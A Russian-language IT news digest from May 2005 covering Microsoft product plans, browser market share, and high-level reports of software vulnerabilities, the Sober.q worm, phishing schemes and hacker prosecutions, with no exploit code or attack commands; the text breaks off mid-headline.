Признавая, что характер работы людей изменился, Microsoft сделает в будущей версии Office усиленный акцент на коллективную работу. Как сообщил в понедельник на конференции Gartner Symposium/ITxpo в Сан-Франциско директор по стратегии технологических платформ Microsoft Билл Хилф, софтверному гиганту помогает в этом компания Groove Networks, возглавляемая Реем Оззи и которую Microsoft приобрела в этом году. Одним из первых шагов в процессе коллективной работы является поиск доступных коллег. В этой связи Microsoft планирует расширить свою текущую работу над корпоративной системой IM (instant messaging) и добавить поддержку интернет-телефонии. Возможность управления технологией Voice over Internet Protocol — «одна из главных особенностей будущей версии Office», сказал Хилф. Компания планирует также продолжать дополнение семейства Office новыми серверными продуктами. Office 12, следующая версия флагманского ПО делопроизводства Microsoft, выйдет в будущем году. Однако пока компания мало что рассказала о том, что в нее войдет. В частности, она сообщила о планах существенного расширения использования XML в качестве средства обмена данными. Одна из причин, по которым Microsoft смотрит в сторону новых серверных продуктов, это тот факт, что многие компании используют Office для решения гораздо более широкого круга задач, чем обычные задачи делопроизводства, для которых продукт предназначался изначально.
ZDNet

18/05/2005 10:10 Многочисленные проблемы с Telnet в OpenServer
Переполнение буфера в функции slc_add_reply многочисленных telnet клиентов (на базе BSD) при хранении LINEMODE-опций позволяет атакующему выполнять произвольный код через ответы с большим количеством SLC-команд. В то же время, переполнение буфера в функции env_opt_add файла telnet.c позволит выполнение произвольного кода через запросы, содержащие огромное количество символов. Уязвимые версии:системные бинарники в OpenServer 5.0.6 /usr/bin/telnet и OpenServer 5.0.7 /usr/bin/telnet.
Подробности

18/05/2005 10:01 Небезопасное создание временных файлов в MySQL
В MySQL обнаружена уязвимость, позволяющая атакующему получить неавторизованный доступ к базе данных или повышенные привилегии. Проблема вызвана ошибкой проектирования скрипта 'mysql_install_db' при создании временных файлов. Уязвимости подвержены MySQL AB MySQL 4.0.0-4.0.11 и MySQL AB MySQL 5.0 .0-alpha - 5.0.4.
Подробности

17/05/2005 13:24 Вышел WM Keeper Classic 2.4.0.1
WebMoney Transfer опубликовала новую версию клиентского программного обеспечения WM Keeper Classic 2.4.0.1, сообщает "Вебпланета". Начиная с версии 2.4.0.1 ключи доступа к WM-идентификатору клиента сохраняются в устройство-зависимом формате, обеспечивающим высокий уровень защиты данных от несанкционированного использования. Для управления WM-идентификатором с другого компьютера WM Keeper Classic 2.4.0.1 необходимо сделать резервную копию ключей и затем с ее помощью восстановить ключи на новом компьютере. Реализованный в новой версии мастер создания резервной копии ключей доступен в диалоге настроек безопасности программы.
Сайт WebMoney

17/05/2005 12:09 Пользователи VPN оказались под угрозой
Пользователи виртуальных частных сетей (VPN) рискуют стать жертвами хакерских атак. Для того чтобы перехватить данные, которыми обмениваются клиенты VPN, злоумышленникам достаточно будет приложить «незначительные усилия». С таким предупреждением выступили специалисты британского Центра по координации безопасности национальной инфраструктуры (NISCC), сообщает сайт News.com. Представители NISCC оценивают степень обнаруженной уязвимости как высокую. Она позволяет хакерам перехватывать пакеты данных, которые проходят между двумя устройствами, использующими протокол защиты IPsec. Кроме того, злоумышленники получают возможность модифицировать подпротокол, который шифрует передаваемые данные. В результате этого данные могут оказаться открытыми для посторонних. «Тщательно модифицировав отдельные части исходящего пакета данных, хакер может вносить контролируемые изменения во внутренний (зашифрованный) пакет... Если эти пакеты будут перехвачены, данные будут открыты посторонним лицам», — предупреждает NISCC на своем сайте. Виртуальная частная сеть позволяет пользователям удаленно работать в домашних или корпоративных сетях. Подключение к нужной сети происходит с помощью клиентской программы VPN, а обмен данными идет в интернет через специальный туннельный протокол. Для защиты VPN используется протокол IPsec, в состав которого входят средства шифрования.
VirusList

17/05/2005 11:36 Клиенты банков пострадали от новой фишинговой схемы
Фишинговые атаки стали более эффективными, считают специалисты по безопасности. Произошло это благодаря персонификации: теперь для того, чтобы выманить у жертвы секретные данные о кредитной карте, мошенники используют реальную информацию о владельце счета. По сообщениям экспертов, от новой технологии фишинга уже пострадали клиенты многих крупных финансовых структур. Раньше письма мошенников в основном содержали информацию о банке, его сотрудниках и ссылку на специальный сайт, который был полностью идентичен порталу финансовой организации и контролировался злоумышленниками. Сейчас же на смену такому грубому способу приходят более эффективные персонифицированные атаки. То есть якобы банковские письма содержат теперь не только информацию о банке, но и личные данные клиента. Среди этих данных обычно встречаются номер счета, имя клиента и адрес его электронной почты. Сообщения рассылаются от имени банков якобы для подтверждения информации о счете: личного иден¬тификационного но¬мера или кода кредитной карты (ряд цифр, напечатанных с обратной стороны). Для большей убедительности в электронном сообщении используются логотипы банка, имена и фами¬лии реальных руководителей организации. Затем все происходит по давно отлаженной схеме: жертве предлагается зайти на идентичный банковскому сайт и "подтвердить" информацию о счете. Необходимость таких действий мошенники объясняют выходом из строя ПО банка или атакой хакеров. Специалисты американской компании Cyota, разработчика ПО для платежных систем, назвали персонифицированные фишинговые письма очень эффективным средством по выманиванию конфиденциальной информации о картах. Наличие в "банковском сообщении" личных данных существенно поднимает уровень доверия жертвы. Представители Cyota заявили также, что уже сейчас от новой фишинговой схемы пострадали многие клиенты известных и уважаемых финансовых структур. Их названия, правда, упомянуты не были. Новый вид атаки обещает быть более продуктивным, нежели обычные фишинговые письма. Неподготовленному человеку крайне трудно отличить мошеннические сообщения с личной информацией от обыкновенных банковских запросов.
Источник

17/05/2005 11:04 Новый червь Sober имеет политическую окраску
«Лаборатория Касперского» сообщает об обнаружении нового опасного интернет-червя Sober.q. Вредоносная программа распространяется при помощи предшествующей версии червя, Sober.p, содержащей функцию загрузки файлов с нескольких интернет-сайтов. Таким образом, новый червь поражает лишь те компьютеры, которые уже заражены Sober.p. Sober.q представляет собой модификацию исходного кода почтового червя Email-Worm.Win32.Sober, однако не содержит функции распространения своего тела в виде вложенных в письма файлов. Вместо этого программа рассылает по электронной почте различные тексты и ссылки радикально-политического характера. Будучи запущенным и активизированным на атакуемом компьютере своим предшественником, Sober.q копирует себя в системный каталог Windows и регистрируется в ключе автозапуска системного реестра и в ключе, отвечающем за запуск исполняемых файлов. Таким образом, червь получает управление при каждом запуске любого исполняемого файла в зараженной системе. Помимо этого, он создает несколько вспомогательных файлов с разными именами в системном каталоге Windows. Затем Sober.q сканирует файловую систему пораженного компьютера и записывает в специальные файлы все найденные адреса электронной почты, за исключением принадлежащих крупным разработчикам антивирусного и прочих видов программного обеспечения. Далее вредоносная программа производит ряд действий, не вписывающихся в стандартный алгоритм действий червей семейства Sober. Вирус создает файл под названием %system%Spammer.ReadMe и следующим текстом на немецком языке: Ich bin immer noch kein Spammer! Aber sollte vielleicht einer werden :) In diesem Sinne. (Я пока еще не спамер! Однако один, вероятно, должен был быть им :) В этом смысле). Затем вредоносная программа рассылает по всем найденным адресам, относящимся к доменным зонам de, ch, at, li и gmx письма с текстами радикально-политического толка на немецком языке, отправляя по всем прочим адресам англоязычные послания. В теле червя содержится несколько десятков различных вариантов текстов для рассылок такого рода. Наконец, аналогично предыдущим вариантам червя, Sober.q путем обращения к нескольким NTP-серверам регулярно проверяет системное время. В случае, если дата соответствует 11 мая 2005 года либо является более поздней, вредоносная программа пытается загрузить произвольные файлы с нескольких интернет-ресурсов. Также Sober.q пытается обнаружить в памяти и прекратить работу приложений, содержащих в названии следующие строки: fxsob, gcas, gcip, giantanti, hijack, inetupd, microsoftanti, nod32kui, nod32, sober, s-t-i-n-g.
Источник

17/05/2005 10:41 Уязвимость в ядре Linux
Сообщается, что устройства Linux kernel и pktcdvd ioctl обработчика подвержены уязвимостям, приводящим к нарушениям в работе локальной памяти. Проблема вызвана отсутствием проверки значений аргументов, передаваемых функциям 'raw_ioctl()' и 'pkt_ioctl()'. Таким образом, локальный злоумышленник может выполнять произвольный код в контексте системного ядра (ring-0). Уязвимость обнаружена в версиях 2.6 до 2.6.12-rc4.
Код эксплоита

17/05/2005 10:15 В Internet Explorer 7 появятся "табы"
Разработчики Internet Explorer объявили, что в седьмой версии появятся так называемые "табы". Табы - это интерфейсный элемент, позволяющий открывать несколько веб-страниц в одном окне браузера. В других браузерах табы используются уже довольно давно. В Opera издавна использовались многодокументные окна (MDI) . Табы в их современной форме популяризовал браузер Mozilla, а затем Firefox. Постепенно этот элемент интерфейса просочился и в другие аналогичные продукты, включая многочисленные браузеры на базе движка Internet Explorer, Opera и Safari (браузер для Mac OS X). Единственным современным браузером (хотя и самым распространённым из всех) остаётся Internet Explorer. В Microsoft считали, что пользователи запутаются, если в браузере табы будут, а в других программах (например, в "Проводнике" Windows или в Windows Media Player) - нет. "Возможно, мы сначала приняли неверное решение, а теперь принимаем правильное", - пишут разработчики в официальном блоге Internet Explorer. В ближайшем будущем ожидается бета-релиз IE7 - лишь "пробный камень" с целью проверить, как скажется изменение интерфейса на совместимости IE и многочисленных плагинов и надстроек к нему.
Подробности

17/05/2005 09:36 Intel не считает уязвимость в HT серьёзной.
Как мы сообщали ранее, студент Колин Персиваль из Ванкувера сообщил об уязвимости в технологии HT (HyperThreading), применяемой в семействе процессоров Pentium 4 (ускорение исполнения программ путем одновременного выполнения двух потоков в одном и том же процессоре). Метод, изложенный в пятницу на конференции BDSCan в Оттаве, опирается на шпионский процесс, внедренный в сервер и разделяющий кэш L2 с криптографическим процессом OpenSSL. Шпионский процесс измеряет время, занимаемое определенными операциями с кэш-памятью, и устанавливает род деятельности другого процесса, собирая информацию (Персиваль называет это «следами, оставленными в кэше», также подобный тип атаки называется Software timing attack) , которая помогает взломать нужные пароли. Intel, поставленная в известность об этой проблеме в марте, считает риск очень низким. Метод работает только на сервере, который злоумышленник уже взломал, установив в нем шпионский процесс. Раз хакеру это удалось, он может похитить данные гораздо легче и быстрее, сказал представитель Intel Говард Хай. Intel отмечает, что данный метод может работать и с другими процессорами, разделяющими ресурсы, а не только с процессорами Intel и технологией Hyperthreading. Между тем компания выражает надежду, что в новых версиях операционных систем Microsoft Windows и Linux эта проблема будет решена. Как пишет сам Персиваль, Линус Торвальдс в обсуждении уязвимости высказал мнение, что он тут не видит большой проблемы (правда, сам Колин пишет, что Линус не является экспертом по компьютерной безопасности). С октября 2004 года, когда Персиваль обнаружил эту лазейку, он работает с FreeBSD и другими разработчиками операционных систем над оценкой рисков, и на его сайте есть обсуждение этой темы. Операционные системы, не использующие гиперпоточность и запрещающие эту технологию, такие как SCO UnixWare, похоже, нечувствительны к данной уязвимости.
Подробности
Сайт Персиваля

17/05/2005 09:19 Microsoft решила объединить все компьютерные проблемы в одну систему
Компания Microsoft анонсировала новый инструмент, призванный универсальным образом заботиться о безопасности пользовательских компьютеров под управлением семейства ОС Windows без необходимости разделять задачи по установке "заплаток", проверок на наличие вирусов, "шпионских программ" (spyware), выявлению и решению других проблем. Компания намерена в течение года ввести сервис Windows OneCare, который бы комплексно решал все эти задачи. Кроме обновления системы, поиска вирусов, "троянов" и "шпионов" сервис предполагает проверку уровня сетевой защищенности (настройку файрвола), а также обслуживание жесткого диска - дефрагментацию и проверку поврежденных файлов, кроме того, будет реализована система резервирования самых необходимых данных. Планируется, что сервис будет реализован в виде автоматической программной услуги, доступной по подписке через Интернет с сайта Microsoft. Кроме того, как заявляется, подписчики получат возможность телефонной консультации со специалистом, стоимость которой будет входить в стоимость подписки. Как известно, ранее Microsoft не работала на рынке ПО для компьютерной безопасности, выйдя туда лишь осенью прошлого года, что сопровождалось покупкой нескольких небольших производителей "защитного" ПО. Традиционно вопросы безопасности решала лишь система обновления Windows Update, через которую пользователи обновляли ОС при обнаружении в них критических уязвимостей. Однако несколько месяцев назад были представлены бета-версии особых модулей для поиска и устранения "вредоносных" и шпионских программ. Вместе с тем, с объявлением о Windows OneCare компания впервые объявила о намерении предоставлять антивирусное решение - сейчас основные антивирусные программы на рынке предлагаются сторонними производителями.
Lenta.Ru

16/05/2005 13:23 F-Secure: у Toyota "иммунитет" к мобильным вирусам
Транспортные средства-зомби пока являются научной фантастикой, утверждают исследователи финской фирмы F-Secure. Специалисты F-Secure провели тестирование, в ходе которого безуспешно пытались заразить навигационную систему Toyota Prius вариантами вируса Cabir и другими вирусами через Bluetooth. Испытания были проведены после появления сообщений о том, что некоторые модели Lexus и Landcruiser, особенно LX470 и LS430, уязвимы для вирусов, заражающих мобильники через Bluetooth. В частности, такое сообщение поступило от «Лаборатории Касперского». В нем говорилось, что мобильные вирусы могут заражать GPS-систему автомобиля, соединенную с мобильником через Bluetooth. Представители Toyota заявили, что их автомобили не подвержены действию этих вирусов, поскольку уязвимая операционная система Symbian в них не используется, сообщил CCRC.
CNews

16/05/2005 12:50 Проект сетевого уровня идентификации
В Microsoft разработали модель распределенной инфраструктуры сетевой идентификации - Identity Metasystem и подготовили ее тестовую реализацию. Назначение инфраструктуры - обеспечить возможность объединения (федерирования) систем идентификации, в том числе через Internet, независимо от используемых в них технологий, в числе которых могут быть Kerberos, X.509 и SAML. Metasystem представляет собой сетевой слой, по которому предполагается передавать весь трафик идентификации независимо от протокола или формата. Когда идентификационные данные достигают своего назначения, программный транслятор преобразует их в формат, необходимый для доступа к нужному ресурсу. Metasystem определяет требования к способам описания учетной записи, организации сеанса обмена данными, установки доверительных отношений между сетевыми узлами и интеграции различных форматов маркеров, предусмотренных тремя вышеперечисленными технологиями. В Microsoft обещают, что подключать к Metasystem произвольные инфраструктуры управления доступом и корпоративные приложения можно будет без их предварительной модификации. Реализация инфраструктуры, созданная в корпорации, полагается на WS-Trust и другие протоколы Web-сервисов, разработанные Microsoft совместно с IBM. В связи с этим некоторые специалисты высказывают мнение, что инициатива Microsoft не получит хода до тех пор, пока данные протоколы не будут переданы на утверждение какой-либо организации по стандартизации.
"Открытые системы"

16/05/2005 12:32 Работать с новой версией антивируса Kaspersky SMTP-Gateway 5.5 стало проще
"Лаборатория Касперского" начала продажи новой версии антивирусного программного комплекса Kaspersky SMTP-Gateway 5.5 для Linux/Unix. Система защиты предназначена для антивирусной обработки проходящего через нее SMTP-трафика. Помимо эффективной защиты от вредоносных программ, разработка "Лаборатории Касперского" объединяет в себе набор таких функций, как маршрутизация почтового трафика и защита от хакерских атак. Программа реализует полноценный почтовый маршрутизатор, работающий под управлением операционных систем Linux, FreeBSD или OpenBSD. Антивирусная безопасность проходящей через почтовый маршрутизатор электронной корреспонденции обеспечивается на многоуровневой основе: проверке на присутствие вирусов подвергаются тела сообщений и вложения, доступна дополнительная фильтрация по именам и MIME-типам вложенных файлов. В процессе антивирусной обработки писем система выявляет инфицированные, подозрительные, поврежденные и защищенные паролем вложенные файлы и тела сообщений. Отправители, адресаты этих сообщений и администратор могут получать от системы соответствующие уведомления. В частности, новая версия позволяет администратору дополнять такое уведомление расширенной справочной информацией (статус проверки, версия программы, дата обновления антивирусных баз и т.д.). Кроме того, администратор может добавлять в обработанные почтовые сообщения сформированный по шаблону текст, который может изменяться для отдельных групп адресатов. Изменен и механизм антивирусной обработки почтового трафика - в Kaspersky SMTP-Gateway 5.5 была внедрена система управления рабочей очередью ожидающих проверки объектов. Теперь администратору доступны такие операции, как просмотр очереди, удаление сообщений из очереди, а также проверка и отправка определенного сообщения вне общей очереди. Можно и ограничивать размер рабочей очереди приложения.
Подробности

16/05/2005 11:03 Правоохранительные органы Беларуси усиливают борьбу с хакерами
Виртуальные мошенники совсем не похожи на традиционных грабителей. Но интеллигентность и внешняя беззащитность – обманчива. Их интересует все, что может быть связано всемирной паутиной, и принесет им большие деньги. В интернете бесконечное множество шпаргалок и подсказок для хакера-новичка, но за его первыми преступными шагами следят правоохранительные органы. Одновременно сами компьютерные взломщики жестко борются с конкурентами. Не отстают от виртуальных преступников и охотники на хакеров. Управление по раскрытию преступлений в сфере высоких технологий постоянно наступает на пятки белорусским взломщикам. С начала года более чем за 150 преступных действий ими возбуждено 79 уголовных дел. Однако законодательство пока обходится мягко с гениями компьютерного взлома. Заместитель начальника управления «К» МВД Беларуси Михаил Старикович отметил, что, по сравнению с США, законодательство у нас мягкое, можно отделаться штрафом за серьезные преступления. Новые кадры для охоты на компьютерных преступников готовятся в ведущих российских и белорусских вузах. Там же самообразованием занимаются и будущие хакеры. Кстати, в Беларуси образовательная информация для виртуальных взломщиков не заблокирована. Смотри, учись! Но если захочется попробовать – автоматически становишься преступником.
Источник

16/05/2005 10:34 Уязвимость в cdrdao
Secunia сообщает о наличии уязвимости ПО для записи дисков в открытых системах cdrdao. Наличие уязвимости позволяет локальному пользователю повысить привилегии в системе. Однако, для этого необходимо наличии флага SUID у исполнимого файла cdrdao. Подробности уязвимости не сообщаются, однако на сайте производителя имеется обновлённая версия 1.2.0.
Обновление

16/05/2005 10:11 Microsoft добавила Wi-Fi-безопасность в Windows
Разработчики Microsoft добавили в патч Windows XP Service Pack 2 (SP2) новый модуль WPA2 (Wi-Fi Protected Access 2), обеспечивающий безопасность Wi-Fi-соединений по стандарту IEEE 802.11i. Обновленный патч поддерживает элемент WPS IE (wireless provisioning services information element), который позволяет провайдерам предоставлять услуги через защищенные и незащищенные хот-споты в единой сетевой инфраструктуре. Обновление уже доступно для бесплатной загрузки
CNews

16/05/2005 09:43 Microsoft анонсировала окончательную версию ПО для поиска на компьютере
Компания Microsoft объявила о выпуске окончательной версии своего инструмента для поиска информации на компьютере, сообщает Reuters. Таким образом, она составит конкуренцию Google и Yahoo, уже выпустившим данный сервис. Также компания Apple ранее выпустила программу для поиска данных на Macintosh. MSN Search Toolbar был доступен в пробной версии пять месяцев назад. Программа позволяла искать электронные письма, документы и записи баз данных, сохраненных на жестком диске. Данный сервис будет более эффективен, чем функция «Найти» в Windows. Программа, доступная на сайте MSN, может распознавать около 200 типов файлов, в том числе Excel, PowerPoint, MP3, GIF и JPG. Доступ к файлам PDF будет возможен после закачки дополнительного ПО от Adobe.
Страница загрузки

15/05/2005 18:53 Антивирус Sophos не сканирует файлы при загрузке
В антивирусном программном обеспечении британской компании Sophos обнаружена уязвимость, которая позволяет загружать зараженные файлы на жесткий диск компьютера, сообщает сайт vnunet.com. В ходе загрузки файлов на жесткий диск они не проходят проверку антивирусным сканером. В результате зараженные файлы при перезагрузке компьютера активируются раньше, чем антивирусная программа. Уязвимость обнаружена в антивирусном пакете Sophos версии 3.93. Компания рекомендует всем пользователям как можно скорее обновить антивирусную программу до версии 5.0.1. «Мы не получали никаких сообщений об указанной проблеме от пользователей последней на данный момент версии антивирусного программного обеспечения Sophos», — заявил главный технический консультант компании Грэхем Клюли (Graham Cluley). Клюли подчеркнул, что программы Sophos могут сканировать файлы в момент сохранения на жесткий диск, однако эта функция обычно оказывается невостребованной и отключается по умолчанию.
Источник

15/05/2005 12:55 Доля MS IE продолжает падать
Случилось страшное: доля MS IE на браузерном рынке США упала-таки ниже отметки 90%. Будем считать, что Рубикон перейден? По сравнению с июнем прошлого года, по состоянию на 29 апреля доля браузеров из многочисленного семейства MS IE снизилась на шесть процентных пунктов и достигла 89%. Второе место (правда, все еще с ошеломляющим отрывом) занимает Mozilla Firefox – у него всего 6,8 процента. Это, впрочем, тоже совсем неплохой результат, поскольку в минувшем октябре, когда компания WebSideStory включила браузер в свою статистику, доля Firefox составляла всего три процента. Еще 2,2% взяли себе "фирменные" браузеры, построенные, как пишет AP, на движке Mozilla. Отметим, что 89% Microsoft - это данные для всех платформ, включая Apple, *nix и другие экзотические системы. Если говорить только лишь о машинах, работающих под Windows, то здесь положение Microsoft выглядит чуть лучше: 91% на рынке США. В Европе позиции Microsoft оптимизма не внушают. Например, среди немецких пользователей браузерами семейства MS IE пользуются лишь 69% пользователей, а 23% предпочитают бесплатный Firefox. А вот в Азии все пока выглядит относительно спокойно. Там с браузерами MS IE мучаются от 94 процентов в Японии до 98 процентов в Китае. Впрочем, учитывая курс Поднебесной на программную автономию, можно предположить что зависимость тамошних пользователей от IE – тоже не надолго.
Источник

15/05/2005 11:52 eEye нашла очередные уязвимости в IE и Outlook
Уязвимости допускают удаленное исполнение кода и, по словам Марка Мейфрета (Marc Maiffret), одного из основателей eEye, могут быть очень легко использованы. Microsoft была извещена 5 мая, однако информации об исправлениях пока нет, cообщает bugtraq.ru. Впрочем, предыдущие серьезные уязвимости в IE и Outlook, обнаруженные eEye, о деталях которых MS была проинформирована в середине марта, до сих пор остаются неисправленными. Попутно eEye сообщает об уязвимости во многих версиях RealPlayer, также приводящей к удаленному исполнению кода. Производитель извещен 4 мая, патча пока нет.
Подробности

15/05/2005 11:12 Осужден член хакерской группы Thr34t Krew
Окружной суд американского города Александрия приговорил к 21 месяцу тюремного заключения 21-летнего жителя штата Индиана Рэймонда Пола Штайгервальта (Raymond Paul Steigerwalt). Штайгервальт признан виновным в заражении червем TK (Backdoor.IRC.Demfire по классификации «Лаборатории Касперского») компьютеров Министерства обороны США, сообщает сайт The Register. Бывший член хакерской группы Thr34t Krew по решению суда должен выплатить оборонному ведомству компенсацию в размере 12 тысяч долларов. Штайгервальт входил в состав Thr34t Krew с октября 2002 по март 2003 года. Обвинители инкриминируют членам этой группы создание компьютерного червя TK. Червь TK использовал уязвимости в веб-сервере Microsoft IIS, распространялся через интернет и устанавливал на зараженные машины бэкдор-утилиты. С их помощью хакеры получали возможность искать новые уязвимые компьютеры и организовывать DDoS-атаки. Среди зараженных машин оказались, по меньшей мере, два компьютера, принадлежащие Министерству обороны США. В общей сложности червь TK заразил около 18 тысяч машин. По оценкам Национального отделения Великобритании по расследованию преступлений в сфере высоких технологий, ущерб от червя составил около 5,5 миллиона фунтов стерлингов.
VirusList

15/05/2005 10:51 Уязвимость в реализации HT во многих ОС
Colin Percival, один из разработчиков FreeBSD и securityteammember, обнаружил уязвимость в технологии HyperThreading (HT) от Intel, о чём он и поведал секьюрити-сообществу на конференции BSDCan 2005. Эта технология реализована в процессорах Intel Pentium Extreme Edition, Pentium 4, Mobile Pentium 4 и Xeon. Colin объясняет - уязвимость позволяет непривилегированному пользователю читать закрытую информацию. Суть уязвимости в том, что процессорное время является не единственным процессорным ресурсом, разделяемым при HT - в целях экономии разделяется и кэш-память. В своём докладе Колин привёл пример текста, позволяющий мониторить разделяемый кэш этих процессоров. Именно совместное использование кэша позволяет организовать скрытую передачу данных между потоками, позволяющую отслеживать выполнение другого потока и получать из него информацию. Это позволяет, например, перехватить секретный RSA-ключ непривилегированным пользователем в BSD-системах. Уязвимостью можно воспользоваться в любой операционной системе (Windows, Linux, BSD etc). Системным администраторам рекомендуется отключить Hyper Threading на многопользовательских машинах немедленно.
Описание в PDF-формате

15/05/2005 10:34 Мобильные вирусы большинству пользователей смартфонов не страшны
В последнее время антивирусные компании все чаще говорят об угрозе массового распространения вирусов для мобильных устройств, в первую очередь, для коммуникаторов. Эти устройства имеют полноценные операционные системы, могут подключаться к интернету и передавать данные через самые разные интерфейсы, то есть среда для распространения вирусов самая благоприятная. Об опасности мобильных вирусов любят говорить в "Лаборатории Касперского", не отстают от российских борцов с вирусами и зарубежные специалисты. Однако пока мобильные вирусы вроде распространяющегося по Bluetooth червя Cabir или приходящего с мультимедийными сообщениями Commwarrior - большая редкость. Как сообщает The Register со ссылкой на данные фирмы WDSGlobal, которая занимается предоставлением технической поддержки пользователям Nokia, T-Mobile, Orange, Sony-Ericsson, HP и других операторов и производителей смартфонов и коммуникаторов, из 275 тысяч звонков, обработанных за последние несколько месяцев, меньше десятка касались мобильных вирусов. То есть сейчас риск столкнуться с мобильным вирусом не превышает 0,0004%. Значительно чаще у владельцев поумневших мобильников возникают проблемы с их настройкой для работы в интернете или для подключения к настольному компьютеру.
Источник

15/05/2005 10:22 Oracle втихомолку сотрудничает с Mozilla
Oracle и Mozilla Foundation тайно образовали совместное предприятие, что породило слухи, будто гигант СУБД планирует выпуск продукта open-source. В феврале на европейской конференции разработчиков open-source (FOSDEM) представители Mozilla Foundation рассказали, что Oracle пригласила трех человек для работы над Mozilla Lightning. Предполагается, что этот проект, нацеленный на интеграцию календаря Mozilla Sunbird с ее же e-mail-программой Thunderbird, станет ключом к преодолению доминирования на рынке продукта Microsoft Outlook. Несмотря на многократные запросы в течение последних двух месяцев, Oracle так и не смогла порекомендовать ZDNet UK своего представителя, который рассказал бы о ходе работы над проектом Lightning. Mozilla Foundation переадресует запросы по этому поводу к Oracle. Отказ Oracle говорить о своем сотрудничестве с Mozilla вынуждает наблюдателей строить догадки, не планирует ли Oracle последовать примеру Novell и выпустить продукт коллективной работы с открытым исходным кодом? На FOSDEM член команды Mozilla Жерве Маркем рассказал, что главным мотивом, побуждающем Oracle сотрудничать с Mozilla над проектом Lightning, вероятно, является желание создать конкурента Microsoft Outlook — и в конечном счете отобрать долю рынка у Exchange. «Ларри кажется, что затратив небольшое количество денег и времени, он сможет досадить Биллу Гейтсу. Монополия Exchange основана на монополии Outlook. Люди отваливают за Exchange уйму денег. Если мы сможем предложить альтернативу Outlook, это заставит Microsoft понервничать».
ZDNet

15/05/2005 09:16 Автор интернет-шутки об аварии на Балаковской АЭС освобожден от ответственности
В Самаре завершился судебный процесс над Сергеем Улитиным, который минувшей осенью разместил в Интернете информацию о якобы произошедшей на Балаковской АЭС крупной аварии, что вызвало панику среди части населения Ульяновской, Саратовской и Самарской областей. Как сообщила в четверг "Российская газета", Советский районный суд Самары постановил прекратить уголовное дело в связи с "деятельным раскаянием" и освободить обвиняемого от уголовной ответственности. Как ранее сообщалось, после появления ложной информации об аварии "повлекшей за собой гибель людей и выброс радиоактивных веществ в атмосферу", несмотря на ее неофициальный характер (власти и органы гражданской обороны не давали никаких сигналов об опасности), она быстро распространилась среди людей, причем ее приняли на веру даже руководители крупных предприятий и образовательных учреждений, некоторые из которых стали принимать меры против возможного заражения. Люди стали скупать йодосодержащие препараты, употреблять в пищу йод, предназначенный для наружного применения, в результате чего четверо жителей города Балаково, в том числе двое детей 8 и 10 лет, были госпитализированы с симптомами йодистой передозировки. Как было разъяснено впоследствии, на АЭС действительно произошла неполадка и сработала аварийная защита, однако повод был незначительным и ситуация не повлекла за собой никаких серьезных последствий. Дело стало предметом рассмотрения прокуратурой Саратовской области, которая 5 ноября возбудила уголовное дело по статье 207 УК РФ ("заведомо ложное сообщение о террористическом акте"). Эта статья предусматривает наказание в виде лишения свободы до трех лет. В ходе следственных мероприятий прокуратура Саратовской области вышла на Улитина, который признался, что его действия были обусловлены намерением "пошутить".
"Российская газета"

14/05/2005 10:39 Заработал поисковик для программистов Koders.com
В интернете заработала специализированная поисковая система, получившая название Koders.com, сообщает "Компьюлента". Новый сервис ориентирован, прежде всего, на программистов. Используя службу, разработчики могут осуществлять поиск по исходным текстам программ, распространяющихся в соответствии с 20 различными лицензиями (BSD, GPL, W3C и пр.). В процессе составления запросов можно использовать не только ключевые слова, но и служебные символы. Например, в ответ на запрос "xml*" система выведет информацию обо всех приложениях, содержащих файлы, названия которых начинаются на "xml": XmlReader, XmlWriter, XmlNode и т.д. Кроме того, поиск можно сузить за счет выбора одного из 30 доступных языков программирования, в том числе С++, Delphi, Fortran, Java, Perl, PHP, Python и SQL. Результаты поиска отображаются в виде списка. Для каждой найденной позиции приводятся фрагмент текста программы, а также сопутствующая информация - название приложения, год создания, количество строк кода и пр. Кликнув по конкретной ссылке, можно просмотреть исходники программы полностью и при необходимости скопировать их. В настоящее время при помощи Koders.com можно осуществлять поиск среди почти 200 миллионов строк кода, и количество индексируемых проектов постоянно пополняется. В целом, система наилучшим образом подходит для поиска типовых решений и универсальных программных блоков, применяющихся в приложениях с открытым кодом.
Поисковик

14/05/2005 10:15 Microsoft запустит платный сервис для защиты ПК
В четверг корпорация Microsoft объявила, что планирует выйти на рынок антивирусных программ. Уже в следующем году пользователям станет доступен платный сервис по годовой подписке Windows OneCare. На следующей неделе компания начинает бета-тестирование услуги, которая включает в себя автоматически обновляемую защиту от вирусов и шпионских программ и два брандмауэра. Кроме того, сервис будет автоматически осуществлять резервное копирование файлов и позволит пользователям периодически проводить очистку диска, дефрагментацию и восстановление файлов. Пока доступ к Windows OneCare получат 60000 сотрудников Microsoft, а осенью корпорация намерена предложить сервис для открытого тестирования рядовым потребителям. О дате запуска службы в коммерческое использование представители Microsoft не сообщают. Известно, что разработка новой услуги велась на протяжении трех лет. Запустив Windows OneCare, Microsoft составит конкуренцию основным игрокам рынка антивирусного ПО - компаниям Symantec и McAfee, пишет The New York Times.
Подробности

14/05/2005 09:41 Microsoft вдохнет новую жизнь в старые ПК
В четверг Microsoft подтвердила, что она разрабатывает новую версию Windows для тех компаний, которые хотят лучше защитить свои устаревшие машины. Продукт с кодовым названием Eiger предназначен главным образом для того, чтобы превратить старые ПК в тонкий клиент, то есть терминал, получающий большую часть информации от центрального сервера. Однако в отличие от обычных тонких клиентов, некоторые программы, включая Internet Explorer, Windows Media Player и антивирусное ПО, смогут исполняться на Eiger-системах локально. Microsoft будет рекомендовать Eiger тем заказчикам, которые не могут или не желают покупать новые ПК, но считают свои старые компьютеры недостаточно безопасными и тяжелыми в управлении. Во многих случаях перевод этих машин на стандартную Windows ХР не представляется целесообразным, даже если он и возможен. «Windows XP не будет как следует работать на этих машинах и может загружаться по 20 минут, — говорит менеджер группы продуктов отделения Microsoft Windows Client Барри Гоффе. — Мы делаем Eiger как раз для таких заказчиков». Однако пока не ясно, когда система Eiger будет готова. Гоффе говорит, что продукт находится на самых ранних стадиях разработки, и на этой неделе компания предложила его предварительную версию нескольким десяткам ранних заказчиков. «Большинство из них, вероятно, все же купит новые ПК с новой ОС, но некоторые не собираются этого делать по финансовым, политическим или каким-то иным причинам», — сказал он. Внутри Eiger представляет собой гибрид Windows XP с Service Pack 2 и Windows XP Embedded. Названа система по имени горы в Швейцарии. Для работы с Eiger Microsoft рекомендует процессор Pentium II и 128 Мбайт памяти; однако система будет работать и на машинах с более старым процессором Pentium и всего с 64 Мбайт памяти.
ZDNet

14/05/2005 09:29 Латвия обязала операторов связи за свой счет установить аппаратуру для прослушки
